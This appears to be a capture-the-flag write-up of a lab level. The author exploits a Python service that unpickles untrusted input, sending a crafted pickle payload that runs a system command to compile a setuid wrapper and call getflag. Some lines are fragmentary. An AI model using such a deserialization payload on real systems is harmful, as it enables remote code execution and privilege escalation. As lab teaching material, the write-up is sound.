Initial reading reveals that the issue here is serialization via
pickle (even if you’re not pythonaut it does stand out in the code).
After going for documentation one can immediately spot following line:
Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
Fair enough. A little bit of digging revealed this. Looks like the game is over. Let’s try that out:
egg = "cos\nsystem\n(S'gcc /tmp/wrap.c -o /tmp/wrap && chmod +s /tmp/wrap'\ntR."
s = socket.socket()
host = "192.168.1.18"
port = 10007
wrap.c is just a C wrapper for
system("/bin/getflag") function; Also instead of using python script you can just
egg string. Continuing:
You have successfully executed getflag on a target account